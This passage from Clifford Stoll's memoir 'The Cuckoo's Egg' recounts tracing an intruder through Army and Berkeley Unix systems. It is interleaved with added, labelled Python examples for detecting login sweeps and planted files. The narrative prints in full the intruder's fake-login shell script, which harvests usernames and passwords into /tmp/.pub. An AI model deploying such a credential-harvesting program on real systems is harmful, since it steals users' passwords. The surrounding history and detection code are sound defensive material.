- Clifford Stoll
Cuckoo's Egg Page 6
“Who are you? How do I know you’re not trying to break in?”
After a few minutes of disbelief, he asked for my phone number, hung up, and called me back. Here’s someone that doesn’t trust strangers. Or did he call me back on a secure phone line?
“Bad news,” I said. “I think I saw someone breaking into your system.”
“Aw, hell—that son of a bitch, Hunter?”
“Yeah. How’d you know?”
“I’ve seen his ass before.”
Chuck McNatt explained through a thick Alabama drawl that the Army’s Redstone Missile Arsenal kept track of its supplies on a couple of Unix computers. To get orders processed quickly, they’d hooked up to Chuck’s computer at the Anniston Depot. Most of their traffic was news updates—not many people logged in remotely.
One Saturday morning, to escape the August heat, Chuck had gone into work and checked the users on his system. Someone named Hunter was using up an enormous amount of computing time. Surprised to see anyone on a Saturday, Chuck had flashed a message on Hunter’s screen, saying “Hey! Identify yourself!”
The mysterious Hunter typed back, “Who do you think I am?”
Chuck wasn’t that gullible. He sent another message, “Identify yourself now or I’ll knock you off the system!”
Back came Hunter’s reply, “I cannot answer.”
“So I bumped him off the machine,” Chuck said. “We called the FBI, but they didn’t give a damn. So we talked CID into tracing every damn connection coming in on our phone lines.”
“What’s the CID—Chestnut Inspection Department?”
“Be serious,” Chuck said. “The CID’s the Army’s cops. The criminal investigation division. But they’re not doin’ much.”
“No classified material lost, huh?”
The FBI in Montgomery, Alabama, told Chuck about the same story as Oakland had told me. They’d investigate when a million dollars disappeared. Until then, don’t bother ’em. Computer crimes weren’t sexy.
“Who’d you find?”
“The weirdest thing,” Chuck continued. “I caught Hunter sneaking into my computer two or three more times, but my telephone recorders didn’t show a thing.”
“Betcha I know why. He’s been coming in through your back door. Your Milnet connection. Some hacker’s been breaking into our system, and he got into your computer this morning.”
Chuck cursed—he’d missed the three-minute connection. He had set traps on all his telephone lines, but hadn’t thought to watch his network links.
“We’re trying to find out who’s hacking our system,” I said. “We figure he’s a student here in Berkeley, and we’re gearing up to track him down. Our first trace points to Oakland or Berkeley.”
“Well, I know how you feel. We all suspect it’s a student here in Alabama,” Chuck said. “We thought about closing up, but we’re out to git him. I’d rather see him behind bars than behind a terminal.”
For the first time, I worried for this hacker’s welfare. If the Army caught the guy, he’d have a rough time.
“Hey, Chuck, have I got a kicker for you. Betcha this guy’s super-user on your system.”
“Naw. He might have stolen an account, but no way he’d get to be super-user. We’re an Army base, not some goofball college.”
I let the swipe at Berkeley pass. “He went looking for your Gnu-Emacs move-mail file.”
“Yeah. So what?”
“What do you know about the nesting habits of cuckoos?” I explained the workings of the Gnu-Emacs security hole.
Chuck was taken aback. “You mean we’ve had this hole since White Sands sent us this Gnu file?” Chuck whistled. “I wonder how long he’s been poking around.” He understood the hole and the implications.
The hacker listed files at the Anniston system. Judging from the dates of these files, he’d been in Anniston’s computers since early June. For four months, an illegitimate system manager used an Alabama Army computer. Yet he’d been discovered by accident, not through some logic bomb or lost information.
No obvious damage.
Looking closely at the morning’s printout, I saw that the hacker had executed the change password command. On the Anniston computer, he had changed Hunter’s password to be “Hedges.” A clue at last: of zillions of possible passwords, he’d chosen Hedges. Hedges Hunter? Hunter Hedges? A hedge hunter? Time to flip through the H’s in the Berkeley telephone book.
Three phone calls to H. Hunter turned up Harold, Heidi, and Hilda Hunter. “Hi, are you interested in a free subscription to Computer Reviews?” No dice. None of them said they cared about computers.
What does a physics lab in Berkeley have in common with an army depot in Anniston, Alabama? You couldn’t find more politically opposite locations: a good-old-boy Army base and a radical hippie town. Yet technically, we shared quite a bit. Both our computers ran Unix and connected through the Milnet network.
But wait—Anniston’s system ran AT&T Unix, not the Berkeley dialect. If I believed Dave Cleveland, then the hacker was at home on Anniston’s system. Might it be a Southern hacker?
I couldn’t stand the sterile, fluorescent lighted halls of the lab anymore, so I went outside to look at the panoramic view of the Bay Area below me. The Berkeley campus lay directly beneath my laboratory. Once the home of the free speech movement and antiwar protests, the campus is still known for its wild politics and ethnic diversity. If I were a little closer, I could probably hear the Young Republicans baiting the Socialist Workers, while the Chinese Club looked on in amazement.
Smoky coffeehouses crowded next to the campus, where haggard grad students scribbled their theses, fueled by espresso. At nearby ice cream shops, giggling sorority girls mingled with punks in black leather and spiked hair. Best of all—Berkeley’s bookstores.
From the front of the lab, I could look farther south, to the pleasant streets of north Oakland, where we lived. There I shared an old bungalow with an assortment of zany roommates. Across the bay, shrouded by fog, was San Francisco—Oz.
Three years ago, Martha had moved here to study law and I’d tagged along. She’d been worth crossing the country for. She was a damned good hiking partner and caver. I first met her when I fell thirty feet inside a cave; she came to the rescue, rappelling down to where I lay incapacitated by a bad sprain and utter infatuation. My injuries healed, thanks to her chicken soup; my affection for the smart-aleck kid who climbed rocks so fearlessly ripened into love.
Now we lived together. She studied law, and actually enjoyed it. She didn’t want to be a lawyer, but a legal philosopher. Somehow, she had time left over to practice aikido, a Japanese martial art, and often came home bruised but grinning. She cooked, gardened, pieced quilts, did carpentry, and made stained glass windows. For all our zaniness, we wallowed in disgustingly wholesome domestic bliss.
I bicycled home and told Martha about the Alabama break-in, speculating about who might be behind it.
“So there’s technocratic vandals,” she said. “What else is new?”
“That’s news in itself. Technicians now have incredible power to control information and communication,” I said.
“So what? Somebody’s always had control over information, and others have always tried to steal it. Read Machiavelli. As technology changes, sneakiness finds new expressions.”
Martha was still giving me a history lesson when Claudia bustled in, complaining about her fifth graders. Life in Berkeley usually includes a roommate or two. Claudia was ours, and a perfect one at that. She was generous and cheerful, eager to share her life, her music, and her kitchen gadgets with us. She was a professional violinist eking out a living by playing in two symphony orchestras and a chamber music trio, and giving lessons to kids.
Claudia was seldom still or quiet. In her few moments between jobs, she simultaneously cooked meals, talked on the phone, and played with her dog.
At first I listened, but soon her voice became like the background chirp of a parakeet while I worried about how malicious this hacker might be. While I’m at home, how do I know what he’s up to?
Claudia knew how to take my mind off the hacker: she brought home a video, Plan 9 from Outer Space—aliens in tinfoil flying saucers drag vampires from graves.
Wednesday, September 17, was a drizzly Berkeley day. As the only California couple without a car, Martha and I had to bicycle through the rain. On my way into the lab, I visited the switchyard, to check for any visits by the hacker. Water dripped off my sopping hair onto the printout, smudging the ink on the paper.
Sometime during the night, someone had connected to our computer, and methodically tried to log into the Unix-4 computer. First they tried to log into the Guest account, using the password “Guest.” Then they tried the Visitor account, with password “Visitor”; then accounts Root, System, Manager, Service, and Sysop. After a couple of minutes, the attacker left.
Could this be a different hacker? This guy didn’t even try valid accounts like Sventek or Stoll. He simply tried obvious account names and simple passwords. I wondered how often such an attack might succeed.
Not often—with six-letter passwords a hacker had a better chance of winning the lottery than randomly guessing a particular password. Since the computer hangs up after a few log-in failures, the attacker would need all night to try even a few hundred possible passwords. No, a hacker couldn’t magically enter my system. He’d need to know at least one password.
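The overnight visitor's walk down the list of generic account names is the sort of thing a defender can pick out of a log automatically. The following is an added example, not code from the book: it parses a few constructed, syslog-style failed-login lines (the format, the host name lbl-unix4 and the source labels are assumptions), flags any source that fails against several generic accounts within a short window, and puts a number on the "better chance of winning the lottery" remark, assuming six lowercase letters and a few hundred tries a night.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log, not from the book: it imitates the overnight visitor in the
# chapter walking down a list of generic account names, plus one ordinary user's typo.
# The line format is an assumed syslog-style layout, not any particular login program's.
SAMPLE_LOG = """\
Sep 17 02:14:03 lbl-unix4 login: FAILED LOGIN 1 FROM tymnet-port-7 FOR guest
Sep 17 02:14:09 lbl-unix4 login: FAILED LOGIN 2 FROM tymnet-port-7 FOR visitor
Sep 17 02:14:15 lbl-unix4 login: FAILED LOGIN 3 FROM tymnet-port-7 FOR root
Sep 17 02:14:21 lbl-unix4 login: FAILED LOGIN 1 FROM tymnet-port-7 FOR system
Sep 17 02:14:28 lbl-unix4 login: FAILED LOGIN 2 FROM tymnet-port-7 FOR manager
Sep 17 02:14:34 lbl-unix4 login: FAILED LOGIN 3 FROM tymnet-port-7 FOR service
Sep 17 02:14:40 lbl-unix4 login: FAILED LOGIN 1 FROM tymnet-port-7 FOR sysop
Sep 17 08:01:10 lbl-unix4 login: FAILED LOGIN 1 FROM tty12 FOR stoll
Sep 17 08:01:25 lbl-unix4 login: LOGIN ON tty12 BY stoll
"""

# Account names that exist, or are expected to exist, on almost any machine. A caller
# who tries several of these in a row is guessing, not mistyping.
GENERIC_ACCOUNTS = {"guest", "visitor", "root", "system", "manager",
                    "service", "sysop", "admin", "operator", "test"}

FAILURE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ login: "
    r"FAILED LOGIN \d+ FROM (?P<src>\S+) FOR (?P<user>\S+)$")


def parse_failures(log_text):
    """Return (timestamp, source, user) for every failed-login line."""
    events = []
    for line in log_text.splitlines():
        m = FAILURE_RE.match(line)
        if m:
            # syslog carries no year; deltas within one day are all we need here
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
            events.append((ts, m["src"], m["user"].lower()))
    return events


def detect_account_sweeps(log_text, window=timedelta(minutes=5), threshold=4):
    """Map source -> sorted generic accounts it failed against, for any source that
    hit at least `threshold` distinct generic accounts inside one `window`."""
    by_src = defaultdict(list)
    for ts, src, user in parse_failures(log_text):
        if user in GENERIC_ACCOUNTS:
            by_src[src].append((ts, user))
    alerts = {}
    for src, evs in by_src.items():
        evs.sort()
        for i, (start, _) in enumerate(evs):
            # every event from this one forward that still falls inside the window
            users = {u for t, u in evs[i:] if t - start <= window}
            if len(users) >= threshold:
                alerts[src] = sorted(users)
                break
    return alerts


def expected_years_to_guess(keyspace=26 ** 6, guesses_per_night=300):
    """Expected years to hit one specific password by blind guessing, when the
    machine drops the line after a few failures and so caps the caller at a few
    hundred tries a night (the chapter's 'need all night' remark, made concrete).
    On average the right guess turns up halfway through the keyspace."""
    return keyspace / 2 / guesses_per_night / 365


if __name__ == "__main__":
    for src, users in detect_account_sweeps(SAMPLE_LOG).items():
        print(f"account sweep from {src}: {', '.join(users)}")
    print(f"blind guessing, six lowercase letters: ~{expected_years_to_guess():.0f} years")
```

The detector keys on distinct generic accounts rather than raw failure counts, so a legitimate user who fat-fingers his own password three times (the tty12 lines) is not reported, while a caller who touches guest, visitor, root and the rest in one sitting is.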
By 12:29, most of my clothes had dried off, though my sneakers still squished. I was part way into a soggy bagel, and most of the way through an astronomy article about physics of the icy satellites of Jupiter. My terminal beeped. Trouble in the switchyard. A quick (though squeaky) trot down the hallway let me watch the hacker connect into our system as Sventek.
Again the adrenaline rush: I called Tymnet and quickly found Ron Vivier. Ron started the trace, and I huddled over the Decwriter, which now tapped out the hacker’s commands.
The hacker wasted no time. He issued commands to show all the active users and any background jobs running. He then fired up Kermit.
Named after the Muppet hero, Kermit is the universal language for connecting computers together. In 1980, Frank da Cruz of Columbia University needed to send data to a number of different computers. Instead of writing five different, incompatible programs, he created a single standard to exchange files between any systems. Kermit’s become the Esperanto of computers.
Absentmindedly chewing on a bagel, I watched as the hacker used Kermit to transfer a short program into our Unix computer. Line by line, faithful Kermit reassembled it, and soon I could read the following program:
echo -n "WELCOME TO THE LBL UNIX-4 COMPUTER"
echo -n "PLEASE LOG IN NOW"
echo -n "LOGIN:"
read account_name
echo -n "ENTER YOUR PASSWORD:"
(stty -echo;
read password;
stty echo;
echo " ";
echo $account_name $password >> /tmp/.pub)
echo "SORRY, TRY AGAIN."
Yikes! Now here was a strange program! This program, when installed in our computer, would prompt a user to enter his name and password. An ordinary user who ran this program would see on his screen:
WELCOME TO THE LBL UNIX-4 COMPUTER
PLEASE LOGIN NOW
Login:
His terminal would then wait until he entered his account name. After he typed his name, the system responds:
ENTER YOUR PASSWORD:
And he’d naturally type in his password. The program then stashes the unlucky user’s name and password into a file, tells the user,
“SORRY, TRY AGAIN”
and then disappears.
Thinking they’ve mistyped their passwords, most people will just try to log in again. By then, their password will already have been stolen.
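Two things give a program like this away on the machine it is planted on: a file that was not in the systems area yesterday, and a hidden file collecting in /tmp. The following is an added example from the defender's side, not code from the book: it baselines a directory tree by content hash and permission bits, reports what appeared, vanished or changed, and lists dot-prefixed files in a shared scratch directory. The "etc", "login", "profile" and "login.new" names are stand-ins built in a temporary directory, not real system files.

```python
import hashlib
import stat
import tempfile
from pathlib import Path


def hash_file(path, chunk=65536):
    """SHA-256 of a file's contents, read in chunks so large binaries are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def snapshot(root):
    """Map each regular file under `root` (relative path) to its hash and mode bits.
    Symlinks are skipped so a planted link cannot make a foreign file look 'known'."""
    root = Path(root)
    result = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and not p.is_symlink():
            result[str(p.relative_to(root))] = {
                "sha256": hash_file(p),
                "mode": stat.S_IMODE(p.stat().st_mode),
            }
    return result


def diff_snapshots(old, new):
    """Files that appeared, vanished, or changed content or permissions."""
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "changed": sorted(k for k in set(old) & set(new) if old[k] != new[k]),
    }


def hidden_files_in(shared_dir):
    """Dot-prefixed regular files in a shared scratch directory. The chapter's program
    wrote its haul to /tmp/.pub; a nightly list of such files is a cheap thing to read."""
    return sorted(p.name for p in Path(shared_dir).iterdir()
                  if p.name.startswith(".") and p.is_file())


def demo():
    """Build a scratch 'system area' and a scratch /tmp (constructed, not real system
    files), baseline them, then make the kind of changes a defender wants to notice."""
    with tempfile.TemporaryDirectory() as work:
        sysarea = Path(work) / "etc"
        sysarea.mkdir()
        (sysarea / "login").write_text("#!/bin/sh\n# stand-in for the genuine login program\n")
        (sysarea / "profile").write_text("PATH=/bin:/usr/bin\n")
        baseline = snapshot(sysarea)

        # What a later sweep should catch: a new program in the system area, a
        # startup file whose contents changed, and a hidden file dropped in /tmp.
        (sysarea / "login.new").write_text("#!/bin/sh\necho stand-in for an unexpected program\n")
        (sysarea / "profile").write_text("PATH=/bin:/usr/bin\nexport TZ=PST8PDT\n")
        scratch = Path(work) / "tmp"
        scratch.mkdir()
        (scratch / ".pub").write_text("someuser somepassword\n")   # constructed contents
        (scratch / "editor.swp").write_text("")

        return {"diff": diff_snapshots(baseline, snapshot(sysarea)),
                "hidden": hidden_files_in(scratch)}


if __name__ == "__main__":
    print(demo())
```

The baseline has to be stored somewhere the intruder cannot rewrite (a printout, as in the chapter, or a write-once medium); a snapshot kept on the same disk in the same account is only as trustworthy as that account.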
Four thousand years ago, the city of Troy fell when Greek soldiers snuck in, hidden inside the Trojan horse.
Deliver a gift that looks attractive, yet steals the very key to your security. Sharpened over the millennia, this technique still works against everyone except the truly paranoid.
The hacker’s Trojan horse program collected passwords. Our visitor wanted our passwords badly enough to risk getting caught installing a program that was bound to be detected.
Was this program a Trojan horse? Maybe I should call it a mockingbird: a false program that sounded like the real thing. I didn’t have time to figure out the difference—within a minute, he was bound to install his program in the systems area, and start it running. What should I do? To disable it would show him that I was watching him. Yet doing nothing would give him a new password every time someone logged in.
But legitimate super-users have power, too. Before the hacker could run his program, I changed one line in it, making it look like he’d made a trivial error. Then I diddled a couple system parameters to slow down the system. Slow enough that the hacker would need ten minutes to rebuild his program. Enough time to let us respond to this new attack.
I shouted down the hall for Guru Dave.
“What do you feed a Trojan horse?”
Dave came running. We shifted the computer into high speed, and prepared a fodder of bogus accounts and false passwords.
But our panic wasn’t necessary. The hacker rebuilt his Trojan horse, but didn’t install it properly. Dave instantly realized that it had been placed in the wrong directory. His Trojan horse would be happy in standard AT&T Unix, but couldn’t cavort in the fields of Berkeley Unix.
Dave grinned. “I won’t say, ‘I told you so,’ but we’re watching someone who’s never been to California. Every Unix jockey on the West Coast would use Berkeley style commands, yet your hacker’s still using AT&T Unix.”
Dave descended from his tower to explain what he meant. “The spelling of his commands is different from Berkeley Unix. But so is the very feel of the program. Kinda like how you can tell that a writer is British rather than American. Sure, you’ll see words like ‘colour’ and ‘defence,’ but you can feel the style difference as well.”
“So what’s the difference?” I asked.
Dave sneered, “The hacker used the command, ‘read’ to get keyboard data. Any civilized programmer would use the ‘set’ command.” For Dave, civilized computers spoke Berkeley Unix. All others were uncouth.
The hacker didn’t realize this. Confident that he’d put his Trojan horse in the right pasture, he ran it as a background process, and logged off. Before he disconnected, Ron Vivier had traced the hacker through Tymnet’s network, and into an Oakland, California, telephone line. The dust hadn’t yet settled on our court order, so we couldn’t start the phone trace.
The hacker had left, but his Trojan horse stayed behind, running as a background task. As Dave predicted, it collected no passwords, for it had been installed in a place that wasn’t referenced during log-in. Sure enough, twenty minutes later, the hacker reappeared, searched for a collection of passwords, and must have been disappointed to find his program had failed.
“Look, Dave, the poor guy needs your help,” I said.
“Right. Should we send him some electronic mail telling him how to write a Trojan horse program that works?” Dave replied.
“He’s got the basics right—imitating our log-in sequence, asking for the username and password, then storing the stolen information. All he needs is a few lessons in Berkeley Unix.”
Wayne stopped by to watch the hacker flounder. “Aw, what do you expect? There’s just too many varieties of Unix. Next time make it easier on those inept hackers, and give them Digital’s VMS operating system. It might not be easier to hack, but at least it’s standardized. IOTTMCO.” Intuitively obvious to the most casual observer.
Wayne had a good point. The hacker’s Trojan horse attack had failed because the operating system wasn’t exactly what he was accustomed to. If everyone used the same version of the same operating system, a single security hole would let hackers into all the computers. Instead, there’s a multitude of operating systems: Berkeley Unix, AT&T Unix, DEC’s VMS, IBM’s TSO, VM, DOS, even Macintoshes and Ataris. This variety of software meant that no single attack could succeed against all systems. Just like genetic diversity, which prevents an epidemic from wiping out a whole species at once, diversity in software is a good thing.
Dave and Wayne continued bickering as they left the switchyard. I hung around a few more minutes, reloading paper. At 1:30 P.M., the hacker reappeared; I was still adjusting the printer when he started typing.
This second session was predictable. Our visitor looked at his special file for passwords and found none. He listed his Trojan horse program and tested it a couple times. It didn’t work. Apparently, he didn’t have a Dave Cleveland for help. Obviously frustrated, he erased the file and logged off in a couple minutes.
But even though he’d been on for only a few minutes, Tymnet managed to trace him, again into Oakland. Ron Vivier, who’d traced Tymnet’s connections, apparently welcomed any emergency that might extricate him from a meeting, so he jumped when I called. If we could only get the phone company to continue the trace, we could wrap up everything in a couple days.
Dave felt he could exclude anyone coming from the West Coast. Chuck in Anniston suspected a hacker from Alabama. Tymnet’s traces pointed to Oakland.
Me? I didn’t know.
Our Tymnet traces reached into Oakland, at various times the home of Jack London, Ed Meese, and Gertrude Stein. A twenty-minute bike ride from the Berkeley campus led to the Oakland Paramount Theater, with its sublime art-deco architecture and eye-popping murals. A few blocks away, in the basement of an ugly modern building, Tymnet rents space for fifty dialup modems. Ron Vivier had traced the hacker from our lab into this bank of modems. Now it was my local telephone company’s turn.
A two-inch-thick cable runs under Broadway, connecting Tymnet’s modems to an unmarked, windowless building. There, Pacific Bell’s Franklin office houses an electronic switch to handle ten thousand telephone lines in area code 415 with the prefix 430. Tymnet leases fifty of these lines.